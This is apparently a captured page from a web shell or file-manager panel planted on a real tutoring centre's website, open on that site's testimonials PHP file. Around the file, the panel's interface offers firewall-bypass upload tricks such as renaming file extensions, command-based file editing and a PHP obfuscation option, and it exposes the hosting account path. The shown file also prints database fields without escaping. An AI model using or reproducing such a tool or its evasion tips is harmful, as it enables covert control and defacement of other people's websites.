Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
home
u820220146
domains
sanketstudycentre.com
public_html
File Name:
<!DOCTYPE html> <html dir="ltr" lang="en"> <head> <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-YCTJTVJXF5"></script> <script> window.dataLayer = window.dataLayer || []; function gtag() { dataLayer.push(arguments); } gtag('js', new Date()); gtag('config', 'G-YCTJTVJXF5'); </script> <?php include 'meta.php'; ?> <title>Testimonials - Sanket Study Centre</title> <link href="https://db.onlinewebfonts.com/c/41ed59a29024f1d258b293b9043e8f81?family=Revue" rel="stylesheet"> <style> .border-left-theme-color-2-6px { border-left: 6px solid #761d19 !important; } .border-right-theme-color-2-6px { border-right: 6px solid #761d19 !important; } ::selection { color: #fff; background: #24404b; } h2 { color: #13232a !important; font-family: Revue !important; } .layer-overlay.overlay-dark-5::before { background-color: rgb(17 17 17 / 88%); } </style> </head> <body class=""> <div id="wrapper" class="clearfix"> <!-- Preloader & Header --> <?php include 'preloader.php'; include 'header.php'; ?> <!-- Body --> <div class="main-content"> <!-- Breadcrumb --> <section class="inner-header divider parallax layer-overlay overlay-dark-5" data-bg-img="images/breadcrumb.webp"> <div class="container pt-70 pb-20"> <div class="section-content"> <div class="row"> <div class="col-md-12"> <h2 class="title text-white">Testimonials <span><img class="mb-5" src="images/ggl_reviews2.png" alt=""></span></h2> <ol class="breadcrumb text-left text-black mt-10"> <li><a href="index">Home</a></li> <li class="active text-gray-silver">Testimonials</li> </ol> </div> </div> </div> </div> </section> <!-- Testimonials --> <section id="gallery" class> <div class="container"> <div class="section-content"> <div class="row mtli-row-clearfix"> <?php require_once 'db.php'; $sql = mysqli_query($link, "SELECT * FROM testimonials ORDER BY testimonial_id DESC"); $num_rows = mysqli_num_rows($sql); if ($num_rows > 0) { while ($row = mysqli_fetch_assoc($sql)) { echo ' <div class="col-xs-12 col-sm-6 col-md-6 sm-text-center mb-30 mb-sm-30"> <div class="team maxwidth400"> <div class="border-1px border-left-theme-color-2-6px media sm-maxwidth400 p-15 mt-0 mb-15"> <div class="testimonial pt-10"> <div class=""> <p>' . $row['description'] . '</p> <p class="author mt-10">- <span class="text-theme-colored">' . $row['name'] . ',</span> <small><em>' . $row['designation'] . '</em></small></p> </div> </div> </div> </div> </div>'; } } ?> <!-- <div class="col-xs-12 col-sm-6 col-md-6 sm-text-center mb-30 mb-sm-30"> <div class="team maxwidth400"> <div class="border-1px border-left-theme-color-2-6px media sm-maxwidth400 p-15 mt-0 mb-15"> <div class="testimonial pt-10"> <div class="thumb pull-left mb-0 mr-0 pr-20"> <img width="75" class="img-circle" alt src="images/testimonials/woman.webp"> </div> <div class="ml-100 "> <p>My daughter's confidence and school performance soared after joining Sanket Study Centre. Their tailored NCERT curriculum and personalized attention made all the difference.</p> <p class="author mt-10">- <span class="text-theme-colored">Mrs. Priya Sharma,</span> <small><em>IT Professional</em></small></p> </div> </div> </div> </div> </div> --> </div> </div> </div> </section> </div> <!-- Footer --> <?php include 'footer.php'; ?> </div> <script src="js/custom.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.actions.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.carousel.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.kenburn.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.layeranimation.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.migration.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.navigation.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.parallax.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.slideanims.min.js"></script> <script type="text/javascript" src="js/revolution-slider/js/extensions/revolution.extension.video.min.js"></script> </body> </html>
Bypass Options
Select edit method
Using basic write file
Using command
Info
Info!
If the strings too long, it will be failed to edit file (command method only).
Obfuscate PHP:
No Obfuscate
Obfuscate
Save Changes